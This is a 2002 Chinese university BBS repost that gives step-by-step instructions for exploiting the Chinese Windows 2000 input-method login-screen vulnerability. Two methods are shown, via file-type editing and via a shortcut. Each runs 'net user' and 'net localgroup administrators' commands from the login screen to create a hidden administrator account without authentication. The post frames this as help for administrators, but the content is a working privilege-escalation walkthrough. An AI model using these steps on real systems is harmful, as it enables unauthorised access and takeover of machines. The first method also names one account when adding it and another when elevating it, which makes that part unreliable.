荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: wolfron (flyselina我爱你^O^), 信区: Microsoft
标 题: 使用输入法漏洞建立管理员账号的方法[转载]
发信站: 荔园晨风BBS站 (Sun Dec 15 21:07:26 2002), 转信
【 以下文字转载自 Security 讨论区 】
【 原文由 wolfron 所发表 】
输入法漏洞可以说是中文Windows2000推出后的第一个致命漏洞,通过它我们可以做
许多的事情,包括建立用户.
我将网上的一些关于如何通过这个漏洞建立用户的收集整理了几种,以备管理员朋
友们不时之需.:)
一、使用文件类型编辑创建管理员用户
开机到登陆界面
1.调出输入法,如全拼->帮助->操作指南,跳出输入法指南帮助文件
2.右击"选项"按钮,选择"跳至url"
3.在跳至URL上添上"c:\",其它的也可.
4.帮助的右边会进入c:5.按帮助上的"选项"按钮.
6.选"internet"选项.会启动文件类型编辑框.
7.新建一个文件类型,如一个you文件类型,在跳出的文件后缀中添上"you".确定.
8.选中文件类型框中的"you"文件类型,点击下面的"高级按钮",会出现文件操作对
话框.
9.新建一种文件操作,操作名任意写,如"ppp"
10.该操作执行的命令如下:
C:\WINNT\system32\cmd.exe /c net user mayi 123456 /add & C:
\WINNT\system32\cmd.exe /c net localgroup administrators
aboutnt /add
完成后退出
11.将c:\的某个文件如"pipi.txt"改为"pipi.txt.mayi",然后双击打开这个文件.
12.通常这个文件是打不开的,系统运行一会便没有了提示,但这时我们已经将用户
mayi加上了,权限是管理员.
13.返回,重新以aboutnt用户登录即可。
二、使用快捷方式创建管理员用户
1-4步与第一种同。
5.右击c:\下的任一文件或文件夹,如右击Winnt文件夹,创建它的快捷方式:"快捷方
式 WINNT".
6.右击"快捷方式 WINNT"文件->"属性"->"快捷方式"标签,将目标修改为"c:
\winnt\system32\net.exe user aboutnt 123456 /add",起始位置修改为"c:
\winnt\system32".确定退出."快捷方式 WINNT"文件的图标会由一个文件夹变成一
个dos窗口.
7.右击"快捷方式 WINNT",运行它,创建"aboutnt"用户
8.重复6步,将目标修改为"c:\winnt\system32\net.exe localgroup
administrators
aboutnt /add",起始位置修改为"c:\winnt\system32".确定退出.
9.右击"快捷方式 WINNT",运行它,将"Aboutnt"用户加入了本地管理员组中.
10.删除"快捷方式 WINNT"文件,返回,以以aboutnt用户登录即可.
--
************************************
^O^菜鸟一个^O^
************************************
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.44.32]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.44.32]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店